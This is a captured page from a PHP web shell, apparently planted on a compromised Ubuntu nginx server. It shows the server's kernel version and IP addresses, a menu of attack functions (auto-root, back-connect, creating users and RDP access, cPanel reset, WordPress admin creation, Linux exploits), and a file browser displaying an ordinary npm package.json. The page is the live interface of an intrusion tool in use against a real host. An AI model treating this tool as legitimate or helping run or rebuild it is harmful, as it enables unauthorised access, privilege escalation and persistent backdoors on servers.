Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
check-types /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
dr-xr-xr-x
COPYING
1.07
KB
-rw-rw-rw-
README.md
21.55
KB
-rw-rw-rw-
package.json
1.28
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "check-types", "version": "11.2.3", "description": "A little library for asserting types and values, with zero dependencies.", "homepage": "https://gitlab.com/philbooth/check-types.js", "bugs": "https://gitlab.com/philbooth/check-types.js/issues", "license": "MIT", "author": "Phil Booth <pmbooth@gmail.com> (https://philbooth.me/)", "main": "./src/check-types", "repository": { "type": "git", "url": "https://gitlab.com/philbooth/check-types.js.git" }, "keywords": [ "type", "types", "type-check", "type-checking", "duck-typing", "arguments", "parameters", "values", "data", "contract", "assert", "check", "verify", "safe", "safety" ], "devDependencies": { "chai": "^4.3.7", "jshint": "^2.13.6", "mocha": "^10.1.0", "please-release-me": "^2.1.4", "uglify-js": "^3.17.4" }, "scripts": { "lint": "jshint ./src/check-types.js", "test": "mocha --ui tdd --reporter spec --colors ./test/check-types.js", "minify": "uglifyjs ./src/check-types.js --compress --mangle --output ./src/check-types.min.js" }, "files": [ "src" ] }
Close